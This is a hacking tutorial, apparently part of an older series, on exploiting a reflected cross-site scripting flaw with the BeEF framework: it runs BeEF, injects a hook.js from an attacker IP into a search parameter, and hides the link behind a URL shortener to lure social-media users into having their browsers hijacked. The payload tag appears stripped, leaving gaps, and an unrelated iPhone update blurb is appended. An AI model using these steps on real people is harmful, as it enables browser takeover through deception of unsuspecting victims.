Exploiting XSS with BeEF: Part 2

May 7, 2015 11:49 AM
Jun 23, 2015 04:39 PM
Article cover image

Now that we have our vulnerable server, it's time to start up BeEF.

Getting Started

Running BeEF

If you have Kali, BeEf comes pre-installed. You can find it in /usr/share/beef-xss/. Once you're there, type ./beef to execute the program.

635665686945944010.jpg

You will need to know both of these addresses. The top one is for the browser-grabbing JavaScript file, and the second one is for accessing the web UI.

Getting into the UI

Once you have run BeEF, you can access the web UI through your browser. Type http://your_ip:3000/ui/panel and you will be redirected to the login page.

635665689754223252.jpg

The default credentials are beef for both the username and password. After logging in, you will be presented with the start/help screen.

635665691349848051.jpg

Exploiting

Build the Malicious Code

Remember that line of text from the terminal earlier? That's the location of our malicious JS code. For me, it's http://10.0.2.13:3000/hook.js .

Since we want this to be run as code, we will implement this with the

Making the URL

Let's go back to when we searched for something. When we did, we had a part of the URL ...?query=lorem+ipsum. This is the part of the URL that tells the website what is being searched. By using XSS, we can take this even further to run pretty much whatever we want. When we build our url, it should look like http://victimsite.com/search.asp?query=

When the victim visits this website, it automatically "searches" for whatever is put behind the query=. But because we have a script, it will be run as a script instead of a search.

Sending to a Victim

In order to "hook" their browser, we need to send them this link. But of course, this might seem suspicious to the average user. But if we were to use a URL shortener like bit.ly, it would be hidden, and more people would click on it on social media.

Most websites that allow you to share articles/videos, etc. automatically include a bit.ly link in the message. If you were to share this bit.ly link on Twitter, no one will think of it being malicious.

http://bit.ly/1EjY8Tq

Doesn't that look much better than http://victimsite.com/search.asp?query=? I think so.

Done!

Once someone clicks on that innocent-looking link, you will have complete control over their browser! If you are attacking over WAN, don't forget to port forward.

Next Time...

In my next article, I will be explaining how to get a persistent connection with BeEF, including how to get a shell on the victim PC.

C|H of C3

Just updated your iPhone? You'll find updated Apple Intelligence capabilities, new wallpapers, and enhancements to Calculator, PDF cropping, and Live Voicemail, among other useful features. Find out what's new and changed on your iPhone with the iOS 18.3 update.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!